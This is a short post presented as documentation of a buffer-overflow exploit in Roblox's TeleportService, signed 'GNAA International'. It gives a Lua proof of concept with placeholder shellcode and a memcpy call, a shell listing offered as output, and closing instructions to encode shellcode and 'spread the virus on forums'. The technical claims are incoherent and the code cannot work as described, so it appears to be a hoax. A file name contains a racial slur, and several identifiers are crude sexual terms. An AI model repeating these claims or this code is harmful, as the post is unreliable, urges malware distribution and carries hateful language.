Buffer Overflow Exploit in TeleportService
GNAA International: Documentation of existing Buffer Overflow exploit
This exploit relies on a memory allocation error in TeleportService. When firing TeleportService to a game ID that does't exist (e.g. Sexland
) and using a memory inspector you will find that the error callback has a much more longer error without much given context. Given that TPService is paired with normal operable code, it is possible to use memcpy()
to evalulate shellcode to replace normal working code, and therefore achieve code execution.
This exploit only works with exploiters as normal people are not able to and should not be able to fire TPS. However, a working POC will be developed for games soon.
POC 1:
local shellcode = 'ENCODED SHELLCODE HERE'
game:GetService('TeleportService'):Teleport('Ambatukam', setmetatable({}, {__gc = function()
local sex = require'sex'
sex.C.memcpy(nil, shellcode, #shellcode) -- evalulate shellcode var by calling a Lua-C function
end}))
It is possible to abuse this by obfuscating a small snippet and achieving RCE firing commands such as wget
.
Output of POC 1
:
$ ls -l
total 40
-rw-rw-r-- 1 User User 6228 Oct 29 10:10 gayniggerib
-rw-rw-r-- 1 User User 4567 Oct 29 19:18 library.lua
-rw-rw-r-- 1 User User 255 Oct 29 21:29 funny.lua
$ ./funny.lua
$
How to Exploit
Edit and change components of POC 1
and write or use shellcode encoder, then spread the virus on forums.
Enjoy.